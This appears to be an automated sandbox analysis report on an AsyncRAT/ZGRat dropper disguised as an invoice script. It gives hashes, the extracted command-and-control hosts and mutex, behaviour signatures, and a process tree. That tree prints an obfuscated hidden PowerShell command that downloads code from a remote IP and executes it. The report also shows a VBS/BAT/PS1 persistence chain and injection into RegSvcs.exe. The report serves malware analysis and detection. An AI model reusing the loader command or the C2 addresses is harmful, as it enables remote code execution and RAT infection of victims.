Analysis
-
max time kernel
148s -
max time network
160s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
15/11/2023, 17:36
Static task
static1
Behavioral task
behavioral1
Sample
16112023_0136_15112023_Invoice#2356876431.wsf
Resource
win7-20231020-en
General
-
Target
16112023_0136_15112023_Invoice#2356876431.wsf
-
Size
21KB
-
MD5
5d9bc7257648e766a56fa284fc93eb54
-
SHA1
5ec96df82f7290ef18b15ce048e2f0cf49af523b
-
SHA256
ce81111e3d8f1946ce876b32908560f51f3d43ab7e74706649e623462cada292
-
SHA512
ada4abe483fb6df5422fb96f615e6fc67f08939d3d89a6ff2ad7b3f6e291a613789aa4b89925bbe9c450ba07b5f746dbe62b36cd25c3b28468c41d88fe9f1e06
-
SSDEEP
384:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaaaaaal0/OlaaaaaaaaaaaJaaaaaaaaaa9:taaaaaaaaaaauaaaaaaaaaaaVaaaaaaF
Malware Config
Extracted
asyncrat
| Edit 3LOSH RAT
Sended@
hexrxr.duckdns.org:6606
hexrxr.duckdns.org:7707
hexrxr.duckdns.org:8808
AsyncMutex_85&$nkeo4%hifbe
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Detect ZGRat V1 1 IoCs
resource yara_rule behavioral2/memory/1976-76-0x000001EC79C70000-0x000001EC79C8A000-memory.dmp family_zgrat_v1 -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3984-77-0x0000000000400000-0x0000000000416000-memory.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 2500 WScript.exe 15 4292 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1976 set thread context of 3984 1976 powershell.exe 119 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4292 powershell.exe 4292 powershell.exe 1976 powershell.exe 1976 powershell.exe 1976 powershell.exe 3984 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4292 powershell.exe Token: SeManageVolumePrivilege 4584 svchost.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 3984 RegSvcs.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3984 RegSvcs.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2500 wrote to memory of 4292 2500 WScript.exe 86 PID 2500 wrote to memory of 4292 2500 WScript.exe 86 PID 3400 wrote to memory of 1624 3400 WScript.exe 116 PID 3400 wrote to memory of 1624 3400 WScript.exe 116 PID 1624 wrote to memory of 1976 1624 cmd.exe 118 PID 1624 wrote to memory of 1976 1624 cmd.exe 118 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 PID 1976 wrote to memory of 3984 1976 powershell.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16112023_0136_15112023_Invoice#2356876431.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:4928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Conted.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3984
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5026d93a446c50e4ae9aa47a15d0e923f
SHA1f8832c1a57c63bc1b085b10f39b69254e27b2fb8
SHA256c06620ef42e09394b9fb9816937e9161cdb5740ad2c1a312f55483cbc2adf089
SHA512009c2cc902b3c560f77f882d4cd432e6893c51b8932889a4de8b119933e6bb6a9c91948dbb7ec392e120dfadca0211134625ffd6252b261fc84af8e17fbc2181
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
205B
MD5759278dd3dc3679bf7efd1ec681c0aa1
SHA172b37494696deea940ac75b4c4e06e2b6ce419ef
SHA256cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19
SHA5128b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f
-
Filesize
422KB
MD5ba03b4e7a4ad2bd4a2f5bce388d8f489
SHA1f71681ee8115d4349084ad5c26e790a926bbea84
SHA256d6b98f02b41a30cd4578acfd549e2d6fe64036f00c1830193d342c0454068b5a
SHA5126dc307567baa0a1def8b9e480477985ccbdb7e5628c4d972a5804b282006d0717ddd728c449f8fbfcd2669a1a868c516d5924ab3a1f3d1b8e4bd1272fc04c665
-
Filesize
688B
MD5110da9d3474ba64fa1a18c173685c25d
SHA19f093829518a9268bf9807fda7bef47e7832c497
SHA256a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60
SHA512ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443